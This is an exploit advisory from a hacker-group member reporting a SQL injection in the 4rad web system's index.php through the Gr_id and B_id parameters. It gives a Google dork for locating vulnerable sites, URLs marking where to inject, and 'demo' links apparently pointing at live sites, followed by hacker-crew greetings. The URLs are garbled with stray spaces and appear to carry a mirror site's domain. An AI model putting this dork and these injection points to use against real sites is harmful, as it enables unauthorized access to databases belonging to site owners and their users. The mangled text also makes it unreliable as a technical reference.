######################################## #
Im Caddy-Dz, member of Exploit-Id
######################################## #
========================================================== ====================================
####
# Exploit Title: 4rad (index. php) SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia [at] hotmail.com | Caddy-Dz [at] exploit-id.com
# Website: www.exploit-id.com
# Google Dork: "Powered by 4rad.net | System"
# Category: Webapps
# Tested on: [Windows Vista Edition Int é gral-French]
####
[*] ExpLo! T:
Http://www.bkjia.com/index.php? Gr_id = 106 & k_id = 755 & B _id = 3783
Http://www.bkjia.com/index.php? Gr_id = 106 & k_id = 755 & B _id = [SQLi]
Http://www.bkjia.com/path/index.php? Gr_id = 106 & k_id = 755 & B _id = [SQLi]
Http://www.bkjia.com /? Gr_id = 39
Http://www.bkjia.com /? Gr_id = [SQLi]
Http://www.bkjia.com/path? Gr_id = [SQLi]
[+] Demos:
Http://www.bkjia.com/index.php? Gr_id = 106 & k_id = 755 & B _id = 3783
Http://www.bkjia.com/index.php? Gr_id = 49 & k_id = 313 & B _id = 1760
Http://www.bkjia.com/index.php? Gr_id = 58 & K id = 450
####
[+] Peace From Algeria
####
===================================== ** Algerians Hackers ** = ============================================= |
# Greets To: |
KedAns-Dz, Kalashinkov3 & ** All Algerians Hackers **, jos_ali_joe, zw.t, |
All Exploit-Id Team, (exploit-id.com), (1337day.com), (dis9.com), (exploit-db.com) |
All My Friends: T! RiRou, ChoK0, MeRdaw! , CaRras0, StiffLer, MaaTar, St0fa, Nissou, |
RmZ... others |
=========================================== |
Fixed: enhanced Filtering